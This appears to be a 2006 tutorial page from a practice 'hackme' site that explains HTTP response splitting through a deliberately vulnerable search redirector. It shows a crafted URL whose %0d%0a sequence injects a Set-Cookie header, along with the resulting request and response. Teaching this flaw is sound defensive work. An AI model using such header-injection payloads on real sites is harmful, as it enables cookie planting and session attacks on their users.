HTTP Response Splitting Attacks

• Episode #0? - HTTP Response Splitting (in planning) - Discusses one of the newest type of attacks.

Attack Pages

Cookie value for previd is set based on GET param previd - We can use this to experiment with full HTTP header re-writing
Simple search redirector

Hackme Helper Window The link is to http://hackme.mightyseek.com/httpressplit/redir.php?q=mightyseek and whatever value is putinto the q paramater will be redirected to a Google search like this: http://www.google.com/search?q=mightyseek This is a pretty simple example, of a way to track the searches happening from your own site, however the code does not prevent HTTP Response Splitting attacks. If I use the following value http://hackme.mightyseek.com/httpressplit/redir.php?q=mightyseek%0d%0aSet-Cookie%3Asome%3Dvalue The %0d%0a would be converted to \r\n and end up adding a new line to the HTTP header The request would be: GET /httpressplit/redir.php?q=mightyseek%0d%0aSet-Cookie%3Asome%3Dvalue HTTP/1.1 Host: hackme.mightyseek.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 The redirect would look like: HTTP/1.x 302 Found Date: Tue, 25 Jul 2006 17:48:26 GMT Server: Apache Location: http://www.google.com/search?q=mightyseek Set-Cookie: some=value Transfer-Encoding: chunked Content-Type: text/html Notice on the line below Location is a Set-Cookie with some=value This would create the cookie in the users browser for the hackme.mightyseek.com site.